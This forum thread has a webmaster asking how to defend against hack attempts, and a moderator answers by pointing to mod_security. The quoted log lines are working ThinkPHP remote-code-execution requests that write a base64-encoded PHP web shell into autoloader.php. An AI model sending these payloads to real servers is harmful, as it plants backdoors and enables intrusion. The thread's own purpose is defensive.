logo
Apache Lounge
Webmasters

 

About Forum Index Downloads Search Register Log in RSS X


Keep Server Online

If you find the Apache Lounge, the downloads and overall help useful, please express your satisfaction with a donation.

or

Bitcoin

A donation makes a contribution towards the costs, the time and effort that's going in this site and building.

Thank You! Steffen

Your donations will help to keep this site alive and well, and continuing building binaries. Apache Lounge is not sponsored.
Post new topic   Forum Index -> Apache View previous topic :: View next topic
Reply to topic   Topic: weird hack attempt and how to safeguard against it
Author
edwardsmarkf



Joined: 20 Feb 2013
Posts: 25
Location: cottonwood, az

PostPosted: Fri 17 Jan '20 18:15    Post subject: weird hack attempt and how to safeguard against it Reply with quote

hello - i received the following hack attempts from ip: 113.250.254.93

Quote:
"GET /public/?s=.%7Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=file_put_contents+(+%22autoloader.php%22,base64_decode+(+%22PD9waHAgZXZhbChnZXRfZGVmaW5lZF92YXJzKClbJ19QT1NUJ11bdHJ1ZV0pOyA/Pg==%22+)+) HTTP/1.1" 404 28417 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0); 360Spider"


Quote:
"GET /public/?s=.%7Cthink%5CContainer/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=file_put_contents+(+%22autoloader.php%22,base64_decode+(+%22PD9waHAgZXZhbChnZXRfZGVmaW5lZF92YXJzKClbJ19QT1NUJ11bdHJ1ZV0pOyA/Pg==%22+)+) HTTP/1.1" 404 28417 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0); 360Spider"


Quote:
"GET /public/?s=.%7Cthink%5CRequest/cache&key=file_put_contents+(+%22autoloader.php%22,base64_decode+(+%22PD9waHAgZXZhbChnZXRfZGVmaW5lZF92YXJzKClbJ19QT1NUJ11bdHJ1ZV0pOyA/Pg==%22+)+)%7Cassert HTTP/1.1" 404 28444 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0); 360Spider"


Quote:
"GET /public/?s=.%7Cthink%5CRequest/input&filter=assert&data[]=file_put_contents+(+%22autoloader.php%22,base64_decode+(+%22PD9waHAgZXZhbChnZXRfZGVmaW5lZF92YXJzKClbJ19QT1NUJ11bdHJ1ZV0pOyA/Pg==%22+)+) HTTP/1.1" 404 28417 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0); 360Spider"


is there any mechanism in place to safeguard against such hack attempts?

also, i reported it here: https://www.abuseipdb.com/report?ip=113.250.254.93
Back to top
James Blond
Moderator


Joined: 19 Jan 2006
Posts: 7288
Location: Germany, Next to Hamburg

PostPosted: Mon 20 Jan '20 10:55    Post subject: Reply with quote

mod_security can prevent such things
Back to top


Reply to topic   Topic: weird hack attempt and how to safeguard against it View previous topic :: View next topic
Post new topic   Forum Index -> Apache